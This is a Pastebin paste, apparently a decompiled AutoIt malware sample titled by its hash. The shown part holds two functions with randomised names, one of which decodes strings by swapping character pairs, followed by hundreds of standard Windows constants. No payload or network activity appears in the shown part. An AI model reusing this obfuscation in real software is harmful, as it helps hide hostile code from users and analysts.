Advertisement
PepperPotts

a144a51b87391257d294c5e8dbf8a767 autoit script

May 9th, 2019
4,485
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 301.37 KB | None | 0 0
  1. Func tznhxlbucosri($stext)
  2. Local $result, $i, $sparams
  3. $result = ""
  4. $i = 1
  5. While $i < StringLen($stext)
  6. $result &= StringMid($stext, $i + 1, 1) & StringMid($stext, $i, 1)
  7. $i = $i + 2
  8. WEnd
  9. If Mod(StringLen($stext), 2) <> 0 Then
  10. $result &= StringRight($stext, 1)
  11. EndIf
  12. Return $result
  13. EndFunc
  14.  
  15. Func ypdszwhkho($iint)
  16. Local $b = ""
  17. For $i = 1 To 32
  18. $b = BitAND($iint, 1) & $b
  19. $iint = BitShift($iint, 1)
  20. Next
  21. Return $b
  22. EndFunc
  23.  
  24. Global Const $fr_private = 16
  25. Global Const $fr_not_enum = 32
  26. Global Const $compression_bitmap_png = 0
  27. Global Const $compression_bitmap_jpeg = 1
  28. Global Const $bs_dibpattern = 5
  29. Global Const $bs_dibpattern8x8 = 8
  30. Global Const $bs_dibpatternpt = 6
  31. Global Const $bs_hatched = 2
  32. Global Const $bs_hollow = 1
  33. Global Const $bs_null = 1
  34. Global Const $bs_pattern = 3
  35. Global Const $bs_pattern8x8 = 7
  36. Global Const $bs_solid = 0
  37. Global Const $hs_bdiagonal = 3
  38. Global Const $hs_cross = 4
  39. Global Const $hs_diagcross = 5
  40. Global Const $hs_fdiagonal = 2
  41. Global Const $hs_horizontal = 0
  42. Global Const $hs_vertical = 1
  43. Global Const $dib_pal_colors = 1
  44. Global Const $dib_rgb_colors = 0
  45. Global Const $ca_negative = 1
  46. Global Const $ca_log_filter = 2
  47. Global Const $illuminant_device_default = 0
  48. Global Const $illuminant_a = 1
  49. Global Const $illuminant_b = 2
  50. Global Const $illuminant_c = 3
  51. Global Const $illuminant_d50 = 4
  52. Global Const $illuminant_d55 = 5
  53. Global Const $illuminant_d65 = 6
  54. Global Const $illuminant_d75 = 7
  55. Global Const $illuminant_f2 = 8
  56. Global Const $illuminant_tungsten = $illuminant_a
  57. Global Const $illuminant_daylight = $illuminant_c
  58. Global Const $illuminant_fluorescent = $illuminant_f2
  59. Global Const $illuminant_ntsc = $illuminant_c
  60. Global Const $bi_rgb = 0
  61. Global Const $bi_rle8 = 1
  62. Global Const $bi_rle4 = 2
  63. Global Const $bi_bitfields = 3
  64. Global Const $bi_jpeg = 4
  65. Global Const $bi_png = 5
  66. Global Const $alternate = 1
  67. Global Const $winding = 2
  68. Global Const $dwmwa_ncrendering_enabled = 1
  69. Global Const $dwmwa_ncrendering_policy = 2
  70. Global Const $dwmwa_transitions_forcedisabled = 3
  71. Global Const $dwmwa_allow_ncpaint = 4
  72. Global Const $dwmwa_caption_button_bounds = 5
  73. Global Const $dwmwa_nonclient_rtl_layout = 6
  74. Global Const $dwmwa_force_iconic_representation = 7
  75. Global Const $dwmwa_flip3d_policy = 8
  76. Global Const $dwmwa_extended_frame_bounds = 9
  77. Global Const $dwmwa_has_iconic_bitmap = 10
  78. Global Const $dwmwa_disallow_peek = 11
  79. Global Const $dwmwa_excluded_from_peek = 12
  80. Global Const $dwmncrp_usewindowstyle = 0
  81. Global Const $dwmncrp_disabled = 1
  82. Global Const $dwmncrp_enabled = 2
  83. Global Const $dwmflip3d_default = 0
  84. Global Const $dwmflip3d_excludebelow = 1
  85. Global Const $dwmflip3d_excludeabove = 2
  86. Global Const $dm_bitsperpel = 262144
  87. Global Const $dm_collate = 32768
  88. Global Const $dm_color = 2048
  89. Global Const $dm_copies = 256
  90. Global Const $dm_defaultsource = 512
  91. Global Const $dm_displayfixedoutput = 536870912
  92. Global Const $dm_displayflags = 2097152
  93. Global Const $dm_displayfrequency = 4194304
  94. Global Const $dm_displayorientation = 128
  95. Global Const $dm_dithertype = 67108864
  96. Global Const $dm_duplex = 4096
  97. Global Const $dm_formname = 65536
  98. Global Const $dm_icmintent = 16777216
  99. Global Const $dm_icmmethod = 8388608
  100. Global Const $dm_logpixels = 131072
  101. Global Const $dm_mediatype = 33554432
  102. Global Const $dm_nup = 64
  103. Global Const $dm_orientation = 1
  104. Global Const $dm_panningheight = 268435456
  105. Global Const $dm_panningwidth = 134217728
  106. Global Const $dm_paperlength = 4
  107. Global Const $dm_papersize = 2
  108. Global Const $dm_paperwidth = 8
  109. Global Const $dm_pelsheight = 1048576
  110. Global Const $dm_pelswidth = 524288
  111. Global Const $dm_position = 32
  112. Global Const $dm_printquality = 1024
  113. Global Const $dm_scale = 16
  114. Global Const $dm_ttoption = 16384
  115. Global Const $dm_yresolution = 8192
  116. Global Const $dmpaper_letter = 1
  117. Global Const $dmpaper_lettersmall = 2
  118. Global Const $dmpaper_tabloid = 3
  119. Global Const $dmpaper_ledger = 4
  120. Global Const $dmpaper_legal = 5
  121. Global Const $dmpaper_statement = 6
  122. Global Const $dmpaper_executive = 7
  123. Global Const $dmpaper_a3 = 8
  124. Global Const $dmpaper_a4 = 9
  125. Global Const $dmpaper_a4small = 10
  126. Global Const $dmpaper_a5 = 11
  127. Global Const $dmpaper_b4 = 12
  128. Global Const $dmpaper_b5 = 13
  129. Global Const $dmpaper_folio = 14
  130. Global Const $dmpaper_quarto = 15
  131. Global Const $dmpaper_10x14 = 16
  132. Global Const $dmpaper_11x17 = 17
  133. Global Const $dmpaper_note = 18
  134. Global Const $dmpaper_env_9 = 19
  135. Global Const $dmpaper_env_10 = 20
  136. Global Const $dmpaper_env_11 = 21
  137. Global Const $dmpaper_env_12 = 22
  138. Global Const $dmpaper_env_14 = 23
  139. Global Const $dmpaper_csheet = 24
  140. Global Const $dmpaper_dsheet = 25
  141. Global Const $dmpaper_esheet = 26
  142. Global Const $dmpaper_env_dl = 27
  143. Global Const $dmpaper_env_c5 = 28
  144. Global Const $dmpaper_env_c3 = 29
  145. Global Const $dmpaper_env_c4 = 30
  146. Global Const $dmpaper_env_c6 = 31
  147. Global Const $dmpaper_env_c65 = 32
  148. Global Const $dmpaper_env_b4 = 33
  149. Global Const $dmpaper_env_b5 = 34
  150. Global Const $dmpaper_env_b6 = 35
  151. Global Const $dmpaper_env_italy = 36
  152. Global Const $dmpaper_env_monarch = 37
  153. Global Const $dmpaper_env_personal = 38
  154. Global Const $dmpaper_fanfold_us = 39
  155. Global Const $dmpaper_fanfold_std_german = 40
  156. Global Const $dmpaper_fanfold_lgl_german = 41
  157. Global Const $dmpaper_iso_b4 = 42
  158. Global Const $dmpaper_japanese_postcard = 43
  159. Global Const $dmpaper_9x11 = 44
  160. Global Const $dmpaper_10x11 = 45
  161. Global Const $dmpaper_15x11 = 46
  162. Global Const $dmpaper_env_invite = 47
  163. Global Const $dmpaper_reserved_48 = 48
  164. Global Const $dmpaper_reserved_49 = 49
  165. Global Const $dmpaper_letter_extra = 50
  166. Global Const $dmpaper_legal_extra = 51
  167. Global Const $dmpaper_tabloid_extra = 52
  168. Global Const $dmpaper_a4_extra = 53
  169. Global Const $dmpaper_letter_transverse = 54
  170. Global Const $dmpaper_a4_transverse = 55
  171. Global Const $dmpaper_letter_extra_transverse = 56
  172. Global Const $dmpaper_a_plus = 57
  173. Global Const $dmpaper_b_plus = 58
  174. Global Const $dmpaper_letter_plus = 59
  175. Global Const $dmpaper_a4_plus = 60
  176. Global Const $dmpaper_a5_transverse = 61
  177. Global Const $dmpaper_b5_transverse = 62
  178. Global Const $dmpaper_a3_extra = 63
  179. Global Const $dmpaper_a5_extra = 64
  180. Global Const $dmpaper_b5_extra = 65
  181. Global Const $dmpaper_a2 = 66
  182. Global Const $dmpaper_a3_transverse = 67
  183. Global Const $dmpaper_a3_extra_transverse = 68
  184. Global Const $dmpaper_dbl_japanese_postcard = 69
  185. Global Const $dmpaper_a6 = 70
  186. Global Const $dmpaper_jenv_kaku2 = 71
  187. Global Const $dmpaper_jenv_kaku3 = 72
  188. Global Const $dmpaper_jenv_chou3 = 73
  189. Global Const $dmpaper_jenv_chou4 = 74
  190. Global Const $dmpaper_letter_rotated = 75
  191. Global Const $dmpaper_a3_rotated = 76
  192. Global Const $dmpaper_a4_rotated = 77
  193. Global Const $dmpaper_a5_rotated = 78
  194. Global Const $dmpaper_b4_jis_rotated = 79
  195. Global Const $dmpaper_b5_jis_rotated = 80
  196. Global Const $dmpaper_japanese_postcard_rotated = 81
  197. Global Const $dmpaper_dbl_japanese_postcard_rotated = 82
  198. Global Const $dmpaper_a6_rotated = 83
  199. Global Const $dmpaper_jenv_kaku2_rotated = 84
  200. Global Const $dmpaper_jenv_kaku3_rotated = 85
  201. Global Const $dmpaper_jenv_chou3_rotated = 86
  202. Global Const $dmpaper_jenv_chou4_rotated = 87
  203. Global Const $dmpaper_b6_jis = 88
  204. Global Const $dmpaper_b6_jis_rotated = 89
  205. Global Const $dmpaper_12x11 = 90
  206. Global Const $dmpaper_jenv_you4 = 91
  207. Global Const $dmpaper_jenv_you4_rotated = 92
  208. Global Const $dmpaper_p16k = 93
  209. Global Const $dmpaper_p32k = 94
  210. Global Const $dmpaper_p32kbig = 95
  211. Global Const $dmpaper_penv_1 = 96
  212. Global Const $dmpaper_penv_2 = 97
  213. Global Const $dmpaper_penv_3 = 98
  214. Global Const $dmpaper_penv_4 = 99
  215. Global Const $dmpaper_penv_5 = 100
  216. Global Const $dmpaper_penv_6 = 101
  217. Global Const $dmpaper_penv_7 = 102
  218. Global Const $dmpaper_penv_8 = 103
  219. Global Const $dmpaper_penv_9 = 104
  220. Global Const $dmpaper_penv_10 = 105
  221. Global Const $dmpaper_p16k_rotated = 106
  222. Global Const $dmpaper_p32k_rotated = 107
  223. Global Const $dmpaper_p32kbig_rotated = 108
  224. Global Const $dmpaper_penv_1_rotated = 109
  225. Global Const $dmpaper_penv_2_rotated = 110
  226. Global Const $dmpaper_penv_3_rotated = 111
  227. Global Const $dmpaper_penv_4_rotated = 112
  228. Global Const $dmpaper_penv_5_rotated = 113
  229. Global Const $dmpaper_penv_6_rotated = 114
  230. Global Const $dmpaper_penv_7_rotated = 115
  231. Global Const $dmpaper_penv_8_rotated = 116
  232. Global Const $dmpaper_penv_9_rotated = 117
  233. Global Const $dmpaper_penv_10_rotated = 118
  234. Global Const $dmpaper_user = 256
  235. Global Const $dmbin_upper = 1
  236. Global Const $dmbin_lower = 2
  237. Global Const $dmbin_middle = 3
  238. Global Const $dmbin_manual = 4
  239. Global Const $dmbin_envelope = 5
  240. Global Const $dmbin_envmanual = 6
  241. Global Const $dmbin_auto = 7
  242. Global Const $dmbin_tractor = 8
  243. Global Const $dmbin_smallfmt = 9
  244. Global Const $dmbin_largefmt = 10
  245. Global Const $dmbin_largecapacity = 11
  246. Global Const $dmbin_cassette = 14
  247. Global Const $dmbin_formsource = 15
  248. Global Const $dmbin_user = 256
  249. Global Const $dmres_draft = -1
  250. Global Const $dmres_low = -2
  251. Global Const $dmres_medium = -3
  252. Global Const $dmres_high = -4
  253. Global Const $dmdo_default = 0
  254. Global Const $dmdo_90 = 1
  255. Global Const $dmdo_180 = 2
  256. Global Const $dmdo_270 = 3
  257. Global Const $dmdfo_default = 0
  258. Global Const $dmdfo_stretch = 1
  259. Global Const $dmdfo_center = 2
  260. Global Const $dmcolor_monochrome = 1
  261. Global Const $dmcolor_color = 2
  262. Global Const $dmdup_simplex = 1
  263. Global Const $dmdup_vertical = 2
  264. Global Const $dmdup_horizontal = 3
  265. Global Const $dmtt_bitmap = 1
  266. Global Const $dmtt_download = 2
  267. Global Const $dmtt_subdev = 3
  268. Global Const $dmtt_download_outline = 4
  269. Global Const $dmcollate_false = 0
  270. Global Const $dmcollate_true = 1
  271. Global Const $dm_grayscale = 1
  272. Global Const $dm_interlaced = 2
  273. Global Const $dmnup_system = 1
  274. Global Const $dmnup_oneup = 2
  275. Global Const $dmicmmethod_none = 1
  276. Global Const $dmicmmethod_system = 2
  277. Global Const $dmicmmethod_driver = 3
  278. Global Const $dmicmmethod_device = 4
  279. Global Const $dmicmmethod_user = 256
  280. Global Const $dmicm_saturate = 1
  281. Global Const $dmicm_contrast = 2
  282. Global Const $dmicm_colorimetric = 3
  283. Global Const $dmicm_abs_colorimetric = 4
  284. Global Const $dmicm_user = 256
  285. Global Const $dmmedia_standard = 1
  286. Global Const $dmmedia_transparency = 2
  287. Global Const $dmmedia_glossy = 3
  288. Global Const $dmmedia_user = 256
  289. Global Const $dmdither_none = 1
  290. Global Const $dmdither_coarse = 2
  291. Global Const $dmdither_fine = 3
  292. Global Const $dmdither_lineart = 4
  293. Global Const $dmdither_errordiffusion = 5
  294. Global Const $dmdither_reserved6 = 6
  295. Global Const $dmdither_reserved7 = 7
  296. Global Const $dmdither_reserved8 = 8
  297. Global Const $dmdither_reserved9 = 9
  298. Global Const $dmdither_grayscale = 10
  299. Global Const $dmdither_user = 256
  300. Global Const $enum_current_settings = -1
  301. Global Const $enum_registry_settings = -2
  302. Global Const $device_fonttype = 2
  303. Global Const $raster_fonttype = 1
  304. Global Const $truetype_fonttype = 4
  305. Global Const $ntm_bold = 32
  306. Global Const $ntm_dsig = 2097152
  307. Global Const $ntm_italic = 1
  308. Global Const $ntm_multiplemaster = 524288
  309. Global Const $ntm_nonnegative_ac = 65536
  310. Global Const $ntm_ps_opentype = 131072
  311. Global Const $ntm_regular = 64
  312. Global Const $ntm_tt_opentype = 262144
  313. Global Const $ntm_type1 = 1048576
  314. Global Const $floodfillborder = 0
  315. Global Const $floodfillsurface = 1
  316. Global Const $ad_counterclockwise = 1
  317. Global Const $ad_clockwise = 2
  318. Global Const $dcb_accumulate = 2
  319. Global Const $dcb_disable = 8
  320. Global Const $dcb_enable = 4
  321. Global Const $dcb_reset = 1
  322. Global Const $dcb_set = BitOR($dcb_reset, $dcb_accumulate)
  323. Global Const $dcx_window = 1
  324. Global Const $dcx_cache = 2
  325. Global Const $dcx_parentclip = 32
  326. Global Const $dcx_clipsiblings = 16
  327. Global Const $dcx_clipchildren = 8
  328. Global Const $dcx_noresetattrs = 4
  329. Global Const $dcx_lockwindowupdate = 1024
  330. Global Const $dcx_excludergn = 64
  331. Global Const $dcx_intersectrgn = 128
  332. Global Const $dcx_intersectupdate = 512
  333. Global Const $dcx_validate = 2097152
  334. Global Const $ggo_bezier = 3
  335. Global Const $ggo_bitmap = 1
  336. Global Const $ggo_glyph_index = 128
  337. Global Const $ggo_gray2_bitmap = 4
  338. Global Const $ggo_gray4_bitmap = 5
  339. Global Const $ggo_gray8_bitmap = 6
  340. Global Const $ggo_metrics = 0
  341. Global Const $ggo_native = 2
  342. Global Const $ggo_unhinted = 256
  343. Global Const $gm_compatible = 1
  344. Global Const $gm_advanced = 2
  345. Global Const $mm_anisotropic = 8
  346. Global Const $mm_hienglish = 5
  347. Global Const $mm_himetric = 3
  348. Global Const $mm_isotropic = 7
  349. Global Const $mm_loenglish = 4
  350. Global Const $mm_lometric = 2
  351. Global Const $mm_text = 1
  352. Global Const $mm_twips = 6
  353. Global Const $r2_black = 1
  354. Global Const $r2_copypen = 13
  355. Global Const $r2_last = 16
  356. Global Const $r2_masknotpen = 3
  357. Global Const $r2_maskpen = 9
  358. Global Const $r2_maskpennot = 5
  359. Global Const $r2_mergenotpen = 12
  360. Global Const $r2_mergepen = 15
  361. Global Const $r2_mergepennot = 14
  362. Global Const $r2_nop = 11
  363. Global Const $r2_not = 6
  364. Global Const $r2_notcopypen = 4
  365. Global Const $r2_notmaskpen = 8
  366. Global Const $r2_notmergepen = 2
  367. Global Const $r2_notxorpen = 10
  368. Global Const $r2_white = 16
  369. Global Const $r2_xorpen = 7
  370. Global Const $blackonwhite = 1
  371. Global Const $coloroncolor = 3
  372. Global Const $halftone = 4
  373. Global Const $whiteonblack = 2
  374. Global Const $stretch_andscans = $blackonwhite
  375. Global Const $stretch_deletescans = $coloroncolor
  376. Global Const $stretch_halftone = $halftone
  377. Global Const $stretch_orscans = $whiteonblack
  378. Global Const $ta_baseline = 24
  379. Global Const $ta_bottom = 8
  380. Global Const $ta_top = 0
  381. Global Const $ta_center = 6
  382. Global Const $ta_left = 0
  383. Global Const $ta_right = 2
  384. Global Const $ta_noupdatecp = 0
  385. Global Const $ta_rtlreading = 256
  386. Global Const $ta_updatecp = 1
  387. Global Const $vta_baseline = $ta_baseline
  388. Global Const $vta_bottom = $ta_right
  389. Global Const $vta_top = $ta_left
  390. Global Const $vta_center = $ta_center
  391. Global Const $vta_left = $ta_bottom
  392. Global Const $vta_right = $ta_top
  393. Global Const $udf_bgr = 1
  394. Global Const $udf_rgb = 0
  395. Global Const $mwt_identity = 1
  396. Global Const $mwt_leftmultiply = 2
  397. Global Const $mwt_rightmultiply = 3
  398. Global Const $mwt_set = 4
  399. Global Const $monitor_defaulttonearest = 2
  400. Global Const $monitor_defaulttonull = 0
  401. Global Const $monitor_defaulttoprimary = 1
  402. Global Const $pt_bezierto = 4
  403. Global Const $pt_lineto = 2
  404. Global Const $pt_moveto = 6
  405. Global Const $pt_closefigure = 1
  406. Global Const $bpbf_compatiblebitmap = 0
  407. Global Const $bpbf_dib = 1
  408. Global Const $bpbf_topdowndib = 2
  409. Global Const $bpbf_topdownmonodib = 3
  410. Global Const $bppf_erase = 1
  411. Global Const $bppf_noclip = 2
  412. Global Const $bppf_nonclient = 4
  413. Global Const $dtt_textcolor = 1
  414. Global Const $dtt_bordercolor = 2
  415. Global Const $dtt_shadowcolor = 4
  416. Global Const $dtt_shadowtype = 8
  417. Global Const $dtt_shadowoffset = 16
  418. Global Const $dtt_bordersize = 32
  419. Global Const $dtt_fontprop = 64
  420. Global Const $dtt_colorprop = 128
  421. Global Const $dtt_stateid = 256
  422. Global Const $dtt_calcrect = 512
  423. Global Const $dtt_applyoverlay = 1024
  424. Global Const $dtt_glowsize = 2048
  425. Global Const $dtt_callback = 4096
  426. Global Const $dtt_composited = 8192
  427. Global Const $dtt_validbits = BitOR($dtt_textcolor, $dtt_bordercolor, $dtt_shadowcolor, $dtt_shadowtype, $dtt_shadowoffset, $dtt_bordersize, $dtt_fontprop, $dtt_colorprop, $dtt_stateid, $dtt_calcrect, $dtt_applyoverlay, $dtt_glowsize, $dtt_composited)
  428. Global Const $tst_none = 0
  429. Global Const $tst_single = 1
  430. Global Const $tst_continuous = 2
  431. Global Const $stap_allow_nonclient = 1
  432. Global Const $stap_allow_controls = 2
  433. Global Const $stap_allow_webcontent = 4
  434. Global Const $gbf_direct = 1
  435. Global Const $gbf_copy = 2
  436. Global Const $gbf_validbits = BitOR($gbf_direct, $gbf_copy)
  437. Global Const $sz_thdocprop_author = "Author"
  438. Global Const $sz_thdocprop_canonicalname = "ThemeName"
  439. Global Const $sz_thdocprop_displayname = "DisplayName"
  440. Global Const $sz_thdocprop_tooltip = "ToolTip"
  441. Global Const $ts_min = 0
  442. Global Const $ts_true = 1
  443. Global Const $ts_draw = 2
  444. Global Const $po_class = 2
  445. Global Const $po_global = 3
  446. Global Const $po_notfound = 4
  447. Global Const $po_part = 1
  448. Global Const $po_state = 0
  449. Global Const $tmt_bool = 203
  450. Global Const $tmt_color = 204
  451. Global Const $tmt_dibdata = 2
  452. Global Const $tmt_diskstream = 213
  453. Global Const $tmt_enum = 200
  454. Global Const $tmt_filename = 206
  455. Global Const $tmt_font = 210
  456. Global Const $tmt_glyphdibdata = 8
  457. Global Const $tmt_hbitmap = 212
  458. Global Const $tmt_int = 202
  459. Global Const $tmt_intlist = 211
  460. Global Const $tmt_margins = 205
  461. Global Const $tmt_position = 208
  462. Global Const $tmt_rect = 209
  463. Global Const $tmt_size = 207
  464. Global Const $tmt_string = 201
  465. Global Const $tmt_alwaysshowsizingbar = 2208
  466. Global Const $tmt_autosize = 2202
  467. Global Const $tmt_bgfill = 2205
  468. Global Const $tmt_borderonly = 2203
  469. Global Const $tmt_composited = 2204
  470. Global Const $tmt_compositedopaque = 2219
  471. Global Const $tmt_drawborders = 2214
  472. Global Const $tmt_flatmenus = 1001
  473. Global Const $tmt_glyphonly = 2207
  474. Global Const $tmt_glyphtransparent = 2206
  475. Global Const $tmt_integralsizing = 2211
  476. Global Const $tmt_localizedmirrorimage = 2220
  477. Global Const $tmt_mirrorimage = 2209
  478. Global Const $tmt_noetchedeffect = 2215
  479. Global Const $tmt_sourcegrow = 2212
  480. Global Const $tmt_sourceshrink = 2213
  481. Global Const $tmt_textapplyoverlay = 2216
  482. Global Const $tmt_textglow = 2217
  483. Global Const $tmt_textitalic = 2218
  484. Global Const $tmt_transparent = 2201
  485. Global Const $tmt_uniformsizing = 2210
  486. Global Const $tmt_userpicture = 5001
  487. Global Const $tmt_accentcolorhint = 3823
  488. Global Const $tmt_activeborder = 1611
  489. Global Const $tmt_activecaption = 1603
  490. Global Const $tmt_appworkspace = 1613
  491. Global Const $tmt_background = 1602
  492. Global Const $tmt_blendcolor = 5003
  493. Global Const $tmt_bodytextcolor = 3827
  494. Global Const $tmt_bordercolor = 3801
  495. Global Const $tmt_bordercolorhint = 3822
  496. Global Const $tmt_btnface = 1616
  497. Global Const $tmt_btnhighlight = 1621
  498. Global Const $tmt_btnshadow = 1617
  499. Global Const $tmt_btntext = 1619
  500. Global Const $tmt_buttonalternateface = 1626
  501. Global Const $tmt_captiontext = 1610
  502. Global Const $tmt_dkshadow3d = 1622
  503. Global Const $tmt_edgedkshadowcolor = 3807
  504. Global Const $tmt_edgefillcolor = 3808
  505. Global Const $tmt_edgehighlightcolor = 3805
  506. Global Const $tmt_edgelightcolor = 3804
  507. Global Const $tmt_edgeshadowcolor = 3806
  508. Global Const $tmt_fillcolor = 3802
  509. Global Const $tmt_fillcolorhint = 3821
  510. Global Const $tmt_fromcolor1 = 2001
  511. Global Const $tmt_fromcolor2 = 2002
  512. Global Const $tmt_fromcolor3 = 2003
  513. Global Const $tmt_fromcolor4 = 2004
  514. Global Const $tmt_fromcolor5 = 2005
  515. Global Const $tmt_glowcolor = 3816
  516. Global Const $tmt_glyphtextcolor = 3819
  517. Global Const $tmt_glyphtransparentcolor = 3820
  518. Global Const $tmt_gradientactivecaption = 1628
  519. Global Const $tmt_gradientcolor1 = 3810
  520. Global Const $tmt_gradientcolor2 = 3811
  521. Global Const $tmt_gradientcolor3 = 3812
  522. Global Const $tmt_gradientcolor4 = 3813
  523. Global Const $tmt_gradientcolor5 = 3814
  524. Global Const $tmt_gradientinactivecaption = 1629
  525. Global Const $tmt_graytext = 1618
  526. Global Const $tmt_heading1textcolor = 3825
  527. Global Const $tmt_heading2textcolor = 3826
  528. Global Const $tmt_highlight = 1614
  529. Global Const $tmt_highlighttext = 1615
  530. Global Const $tmt_hottracking = 1627
  531. Global Const $tmt_inactiveborder = 1612
  532. Global Const $tmt_inactivecaption = 1604
  533. Global Const $tmt_inactivecaptiontext = 1620
  534. Global Const $tmt_infobk = 1625
  535. Global Const $tmt_infotext = 1624
  536. Global Const $tmt_light3d = 1623
  537. Global Const $tmt_menu = 1605
  538. Global Const $tmt_menubar = 1631
  539. Global Const $tmt_menuhilight = 1630
  540. Global Const $tmt_menutext = 1608
  541. Global Const $tmt_scrollbar = 1601
  542. Global Const $tmt_shadowcolor = 3815
  543. Global Const $tmt_textbordercolor = 3817
  544. Global Const $tmt_textcolor = 3803
  545. Global Const $tmt_textcolorhint = 3824
  546. Global Const $tmt_textshadowcolor = 3818
  547. Global Const $tmt_transparentcolor = 3809
  548. Global Const $tmt_window = 1606
  549. Global Const $tmt_windowframe = 1607
  550. Global Const $tmt_windowtext = 1609
  551. Global Const $tmt_atlasimage = 8000
  552. Global Const $tmt_bgtype = 4001
  553. Global Const $tmt_bordertype = 4002
  554. Global Const $tmt_contentalignment = 4006
  555. Global Const $tmt_filltype = 4003
  556. Global Const $tmt_glyphtype = 4012
  557. Global Const $tmt_glyphfontsizingtype = 4014
  558. Global Const $tmt_halign = 4005
  559. Global Const $tmt_iconeffect = 4009
  560. Global Const $tmt_imagelayout = 4011
  561. Global Const $tmt_imageselecttype = 4013
  562. Global Const $tmt_offsettype = 4008
  563. Global Const $tmt_sizingtype = 4004
  564. Global Const $tmt_textshadowtype = 4010
  565. Global Const $tmt_truesizescalingtype = 4015
  566. Global Const $tmt_valign = 4007
  567. Global Const $tmt_glyphimagefile = 3008
  568. Global Const $tmt_imagefile = 3001
  569. Global Const $tmt_imagefile1 = 3002
  570. Global Const $tmt_imagefile2 = 3003
  571. Global Const $tmt_imagefile3 = 3004
  572. Global Const $tmt_imagefile4 = 3005
  573. Global Const $tmt_imagefile5 = 3006
  574. Global Const $tmt_scaledbackground = 7001
  575. Global Const $tmt_bodyfont = 809
  576. Global Const $tmt_captionfont = 801
  577. Global Const $tmt_glyphfont = 2601
  578. Global Const $tmt_heading1font = 807
  579. Global Const $tmt_heading2font = 808
  580. Global Const $tmt_icontitlefont = 806
  581. Global Const $tmt_menufont = 803
  582. Global Const $tmt_msgboxfont = 805
  583. Global Const $tmt_smallcaptionfont = 802
  584. Global Const $tmt_statusfont = 804
  585. Global Const $tmt_alphalevel = 2402
  586. Global Const $tmt_alphathreshold = 2415
  587. Global Const $tmt_animationdelay = 2428
  588. Global Const $tmt_animationduration = 5006
  589. Global Const $tmt_bordersize = 2403
  590. Global Const $tmt_charset = 403
  591. Global Const $tmt_colorizationcolor = 2431
  592. Global Const $tmt_colorizationopacity = 2432
  593. Global Const $tmt_framespersecond = 2426
  594. Global Const $tmt_fromhue1 = 1801
  595. Global Const $tmt_fromhue2 = 1802
  596. Global Const $tmt_fromhue3 = 1803
  597. Global Const $tmt_fromhue4 = 1804
  598. Global Const $tmt_fromhue5 = 1805
  599. Global Const $tmt_glowintensity = 2429
  600. Global Const $tmt_glyphindex = 2418
  601. Global Const $tmt_gradientratio1 = 2406
  602. Global Const $tmt_gradientratio2 = 2407
  603. Global Const $tmt_gradientratio3 = 2408
  604. Global Const $tmt_gradientratio4 = 2409
  605. Global Const $tmt_gradientratio5 = 2410
  606. Global Const $tmt_height = 2417
  607. Global Const $tmt_imagecount = 2401
  608. Global Const $tmt_mincolordepth = 1301
  609. Global Const $tmt_mindpi1 = 2420
  610. Global Const $tmt_mindpi2 = 2421
  611. Global Const $tmt_mindpi3 = 2422
  612. Global Const $tmt_mindpi4 = 2423
  613. Global Const $tmt_mindpi5 = 2424
  614. Global Const $tmt_opacity = 2430
  615. Global Const $tmt_pixelsperframe = 2427
  616. Global Const $tmt_progresschunksize = 2411
  617. Global Const $tmt_progressspacesize = 2412
  618. Global Const $tmt_roundcornerheight = 2405
  619. Global Const $tmt_roundcornerwidth = 2404
  620. Global Const $tmt_saturation = 2413
  621. Global Const $tmt_textbordersize = 2414
  622. Global Const $tmt_textglowsize = 2425
  623. Global Const $tmt_tocolor1 = 2006
  624. Global Const $tmt_tocolor2 = 2007
  625. Global Const $tmt_tocolor3 = 2008
  626. Global Const $tmt_tocolor4 = 2009
  627. Global Const $tmt_tocolor5 = 2010
  628. Global Const $tmt_tohue1 = 1806
  629. Global Const $tmt_tohue2 = 1807
  630. Global Const $tmt_tohue3 = 1808
  631. Global Const $tmt_tohue4 = 1809
  632. Global Const $tmt_tohue5 = 1810
  633. Global Const $tmt_truesizestretchmark = 2419
  634. Global Const $tmt_width = 2416
  635. Global Const $tmt_transitiondurations = 6000
  636. Global Const $tmt_captionmargins = 3603
  637. Global Const $tmt_contentmargins = 3602
  638. Global Const $tmt_sizingmargins = 3601
  639. Global Const $tmt_minsize = 3403
  640. Global Const $tmt_minsize1 = 3404
  641. Global Const $tmt_minsize2 = 3405
  642. Global Const $tmt_minsize3 = 3406
  643. Global Const $tmt_minsize4 = 3407
  644. Global Const $tmt_minsize5 = 3408
  645. Global Const $tmt_normalsize = 3409
  646. Global Const $tmt_offset = 3401
  647. Global Const $tmt_textshadowoffset = 3402
  648. Global Const $tmt_animationbuttonrect = 5005
  649. Global Const $tmt_atlasrect = 8002
  650. Global Const $tmt_customsplitrect = 5004
  651. Global Const $tmt_defaultpanesize = 5002
  652. Global Const $tmt_captionbarheight = 1205
  653. Global Const $tmt_captionbarwidth = 1204
  654. Global Const $tmt_menubarheight = 1209
  655. Global Const $tmt_menubarwidth = 1208
  656. Global Const $tmt_paddedborderwidth = 1210
  657. Global Const $tmt_scrollbarheight = 1203
  658. Global Const $tmt_scrollbarwidth = 1202
  659. Global Const $tmt_sizingborderwidth = 1201
  660. Global Const $tmt_smcaptionbarheight = 1207
  661. Global Const $tmt_smcaptionbarwidth = 1206
  662. Global Const $tmt_alias = 1404
  663. Global Const $tmt_atlasinputimage = 8001
  664. Global Const $tmt_author = 604
  665. Global Const $tmt_classicvalue = 3202
  666. Global Const $tmt_colorschemes = 401
  667. Global Const $tmt_company = 603
  668. Global Const $tmt_copyright = 605
  669. Global Const $tmt_cssname = 1401
  670. Global Const $tmt_description = 608
  671. Global Const $tmt_displayname = 601
  672. Global Const $tmt_lastupdated = 1403
  673. Global Const $tmt_sizes = 402
  674. Global Const $tmt_text = 3201
  675. Global Const $tmt_tooltip = 602
  676. Global Const $tmt_url = 606
  677. Global Const $tmt_version = 607
  678. Global Const $tmt_xmlname = 1402
  679. Global Const $tmt_name = 600
  680. Global Const $color_aqua = 65535
  681. Global Const $color_black = 0
  682. Global Const $color_blue = 255
  683. Global Const $color_cream = 16776176
  684. Global Const $color_fuchsia = 16711935
  685. Global Const $color_gray = 8421504
  686. Global Const $color_green = 32768
  687. Global Const $color_lime = 65280
  688. Global Const $color_maroon = 9116770
  689. Global Const $color_medblue = 708
  690. Global Const $color_medgray = 10526884
  691. Global Const $color_moneygreen = 12639424
  692. Global Const $color_navy = 128
  693. Global Const $color_olive = 8421376
  694. Global Const $color_purple = 8388736
  695. Global Const $color_red = 16711680
  696. Global Const $color_silver = 12632256
  697. Global Const $color_skyblue = 10930928
  698. Global Const $color_teal = 32896
